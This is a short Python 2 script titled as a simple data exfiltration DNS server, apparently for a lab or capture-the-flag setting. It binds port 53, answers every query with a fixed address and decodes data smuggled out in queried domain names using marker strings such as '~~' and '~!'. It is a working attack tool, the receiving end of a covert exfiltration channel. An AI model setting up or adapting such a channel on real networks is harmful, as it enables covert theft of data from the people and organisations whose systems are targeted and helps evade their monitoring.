Simple data exfiltration dns server

dnsrv.py

#!/usr/bin/env python
# based on http://www.tranquilidadtecnologica.com/2006/04/servidor-fake-dns-en-python.html
import socket

class DNSQuery:
	def __init__(self, data):
		self.data=data
		self.domain=''
		tipo = (ord(data[2]) >> 3) & 15   
		if tipo == 0:                     
			ini=12
			lon=ord(data[ini])
		while lon != 0:
			self.domain+=data[ini+1:ini+lon+1]+'.'
			ini+=lon+1
			lon=ord(data[ini])

	def request(self, ip):
		packet=''
		if self.domain:
			packet+=self.data[:2] + "\x81\x80"
			packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' 
			packet+=self.data[12:]                                         
			packet+='\xc0\x0c'                                             
			packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'             
			packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
		return packet

	last = []
	def uprint(self, text): # dont print same lines multiple times
		if text in self.last:
			return
		else:
			self.last.append(text)
			print(text)
		if len(self.last) > 4:
			self.last = []

	def pprint(self):
	    text = self.domain
	    text = text.replace("--"," ")
	    text = text.replace("~~","\n")
	    clean = []
	    for line in text.splitlines():		    	   	
	    	if "~!" in line:
	    		cleaned = line.replace("~!", "")
	    		#self.uprint(cleaned)
	    		print(cleaned)

if __name__ == '__main__':
  ip='10.10.16.46'
  print 'FakeDNS:: dom.query. 60 IN A %s' % ip

  udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  udps.bind(('',53))

  try:
    while 1:
      data, addr = udps.recvfrom(1024)
      p=DNSQuery(data)
      udps.sendto(p.request(ip), addr)
      p.pprint()
  except KeyboardInterrupt:
    print 'Done'
    udps.close()